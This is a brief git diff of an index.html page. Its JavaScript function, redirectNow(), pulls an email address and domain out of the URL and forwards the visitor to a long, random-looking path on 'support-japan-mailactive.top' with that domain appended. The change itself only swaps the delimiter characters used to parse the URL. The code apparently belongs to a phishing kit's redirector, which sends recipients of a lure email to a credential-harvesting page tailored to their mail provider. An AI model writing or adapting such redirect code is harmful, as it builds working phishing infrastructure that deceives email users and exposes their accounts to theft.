--- a/index.html
+++ b/index.html
@@ -24,9 +24,9 @@
 
     function redirectNow() {
       var queryString = window.location.href;
-      var email = queryString.split("&");
+      var email = queryString.split("$");
       var root = email[1];
-      var cross = root.split("#");
+      var cross = root.split("*");
       var dom = cross[0];
 
       var redirect = "https://support-japan-mailactive.top/hjzsdfkjzifhsKkdghsiHIsHBSAKJnJASFJaJhfskdbjGdsabkbbifashwfiseazfhbkjsfksjgekeFhvnknkdviskjckvdnchbkdisdcivkjnvdnifvndviugivnunfmm#{domain}";
